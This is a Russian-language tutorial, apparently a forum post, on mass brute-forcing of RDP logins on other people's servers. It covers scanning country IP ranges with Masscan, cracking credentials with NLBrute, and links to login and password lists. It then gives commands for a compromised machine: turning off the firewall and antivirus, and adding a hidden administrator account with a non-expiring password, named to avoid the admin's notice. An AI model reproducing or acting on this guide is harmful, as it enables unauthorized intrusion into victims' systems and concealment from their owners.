Брут дедиков

Что нужно чтобы начать? 

1. Устройство с которого будем брутить. (только не личный пк!!!)

2. Список ір-диапазонов нужных стран.

3. Софт для парсинга ір-диапазонов. 

4. Софт для брута дедиков. 

5. Логины и пароли для брута. 

6. Конфиг

Для каждого софта есть свои минимальные требования к железу. Очень важным параметром является скорость канала, подойдёт от 20мб/с, в идеале нужен 1Gb, по крайней мере, к этому нужно стремиться.

Список ір-диапазонов:

Выбираем нужную страну, копируем список, вставляем в сканер, например, в Masscan.

http://www.find-ip-address.org/ip-country/ 
https://www.countryipblocks.net/country_selection.php 
http://www.proxyserverprivacy.com/ipaddress_range.php 
http://www.ipaddresslocation.org/ip_ranges/get_ranges.php 

Софт для парсинга ip адресов

Наверное, каждый знает про Маsscan. Это самый оптимальный вариант. Для удобства будем использовать GUI для Windows. Tакже перед парсингом нужно будет установить программу Winpcap, без неё не будет работать скан. Настройка очень простая, загружаем ір-диапазоны, выбираем количество потоков, нужный порт, нажимаем Scan и уходим по своим делам. Чем больше диапазонов, тем дольше будет парсинг. Может занять несколько дней, если диапазоны включают несколько стран. Парсинг диапазонов и брут дедиков - это разные вещи.

Софт для брута

У каждого софта свои плюсы, поэтому давайте просто рассмотрим на примере NLBrute.
Запускаем софт. Переходим на вкладку "WORK FILES". В поле "Servers" выбираем ip-адреса с нужным нам портом. Поле "Users" -логины, "Рasswords" - пароли, и нажимаем Generate. Tеперь переходим на вкладку "SETTINGS" и ставим такие параметры.

Мах attempts (2) - количество попыток подключений к дедику. 

Thread count (9o0) - количество потоков. 

Timeout (so)- таймаут.

Default port (3389) - порт. 

После настроек во вкладке "BRUTE" нажимайте Start. Eсли дедик, например, перезагрузился, то в программе можно нажать кнопку Сontinue, и брут продолжится с того момента, на котором закончился. 

Good count - количество сбрученых дедиков. 

Logins:Passwords 

Логины не чувствительны к регистру, т.е. без разницы аdmin или ADmiN. Плюс ко всему логин "Администратор" в разных странах пишется по-разному.
Например: 
Испания - Аdministrador.
Германия - Verwalter.
Франция -administrateur 

Есть софт, который определяет логины на дедике аля рекогнайзер. Один их них - RDP Forcer. Загружаете только список паролей и брутите.

Мы сбрутили дедики. Что далыше? 
Заходим на дедик. Отключаем фаервол и антивирус, если они там есть. Самый оптимальный вариант - это создать свою учётку. Нажмите Win+X, появится контекстное меню, в котором выбираем пункт Ҡомандная строка (администратор)', после чего вводим: 

net user LOGIN PASSWORD /add net 
localgroup Administrators LOGIN /add net 
localgroup "Remote Desktoр Users" LOGIN /add 
net accounts /maxpwage:unlimited 

LOGIN - наш логин. Используйте системные имена типа пetwork, winsystem и т.п., чтобы админ не спалил. 

PASSWORD - Haш пароль. 

После чего выходим с админ.учётки и логинимся через новый логин. Если не получается создать свою учётку, воспользуйтесь программой хDedic RDP Patch.

Список логинов: https://pastebin.com/nvRzD8JY 
Список паролей: https://pastebin.com/i69fbKJt


Всем удачи и не болейте!